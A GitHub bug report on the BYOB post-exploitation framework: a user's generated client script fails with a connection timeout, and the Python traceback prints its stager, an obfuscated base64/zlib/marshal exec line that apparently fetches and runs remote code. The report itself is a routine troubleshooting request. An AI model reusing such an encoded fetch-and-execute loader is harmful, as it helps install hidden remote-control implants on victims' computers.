malwaredllc / byob

An open-source post-exploitation framework for students, researchers and developers.
https://byob.dev
GNU General Public License v3.0
8.85k stars 2.1k forks source link

I tried run on my pc and it shows this #704

Closed AxMilin closed 3 weeks ago

AxMilin commented 3 months ago

C:\Users\eucha\Downloads>py byob_gWu.py Traceback (most recent call last): File "C:\Users\eucha\AppData\Local\Programs\Python\Python311\Lib\urllib\request.py", line 1348, in do_open h.request(req.get_method(), req.selector, req.data, headers, File "C:\Users\eucha\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 1283, in request self._send_request(method, url, body, headers, encode_chunked) File "C:\Users\eucha\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 1329, in _send_request self.endheaders(body, encode_chunked=encode_chunked) File "C:\Users\eucha\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 1278, in endheaders self._send_output(message_body, encode_chunked=encode_chunked) File "C:\Users\eucha\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 1038, in _send_output self.send(msg) File "C:\Users\eucha\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 976, in send self.connect() File "C:\Users\eucha\AppData\Local\Programs\Python\Python311\Lib\http\client.py", line 942, in connect self.sock = self._create_connection( ^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\eucha\AppData\Local\Programs\Python\Python311\Lib\socket.py", line 851, in create_connection raise exceptions[0] File "C:\Users\eucha\AppData\Local\Programs\Python\Python311\Lib\socket.py", line 836, in create_connection sock.connect(sa) TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond

During handling of the above exception, another exception occurred:

Traceback (most recent call last): File "C:\Users\eucha\Downloads\byob_gWu.py", line 5, in exec(eval(marshal.loads(zlib.decompress(base64.b64decode(b'eJwrdWFgYCgtyskvSM3TUM8oKSmw0tdPrNDNzczJzNMrKSpNTUnJK9ZLzs+1MjMwsjDV1y8uSUxPLSrWTw8v1SuoVNfUK0pNTNHQBAB47xgD'))))) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "", line 1, in File "C:\Users\eucha\AppData\Local\Programs\Python\Python311\Lib\urllib\request.py", line 216, in urlopen return opener.open(url, data, timeout) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\eucha\AppData\Local\Programs\Python\Python311\Lib\urllib\request.py", line 519, in open response = self._open(req, data) ^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\eucha\AppData\Local\Programs\Python\Python311\Lib\urllib\request.py", line 536, in _open result = self._call_chain(self.handle_open, protocol, protocol + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\eucha\AppData\Local\Programs\Python\Python311\Lib\urllib\request.py", line 496, in _call_chain result = func(*args) ^^^^^^^^^^^ File "C:\Users\eucha\AppData\Local\Programs\Python\Python311\Lib\urllib\request.py", line 1377, in http_open return self.do_open(http.client.HTTPConnection, req) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\eucha\AppData\Local\Programs\Python\Python311\Lib\urllib\request.py", line 1351, in do_open raise URLError(err) urllib.error.URLError: <urlopen error [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond>

github-actions[bot] commented 1 month ago

Stale issue message